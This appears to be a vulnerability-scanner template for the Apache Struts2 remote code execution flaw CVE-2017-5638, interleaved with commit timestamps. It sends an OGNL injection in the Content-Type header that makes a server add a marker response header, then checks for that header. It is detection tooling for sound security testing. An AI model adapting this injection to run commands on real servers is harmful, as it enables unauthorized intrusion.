2021-01-02 05:02:50 +00:00
id : CVE-2017-5638
2020-08-19 13:13:31 +00:00
info :
2021-02-22 07:01:32 +00:00
author : Random Robbie
2021-03-06 06:26:16 +00:00
name : Apache Struts2 RCE
2020-08-19 13:13:31 +00:00
severity : critical
2020-08-27 16:19:24 +00:00
description : Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’ s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
2021-02-22 07:01:32 +00:00
tags : cve,cve2017,struts,rce,apache
2021-04-18 13:02:50 +00:00
reference : https://github.com/mazen160/struts-pwn
2020-08-19 13:13:31 +00:00
requests :
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
Accept-Charset : iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language : en
Content-Type : %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Connection : Keep-Alive
User-Agent : Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma : no -cache
Accept : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers :
- type : word
words :
2020-08-30 04:14:52 +00:00
- "X-Hacker: Bounty Plz"
part : header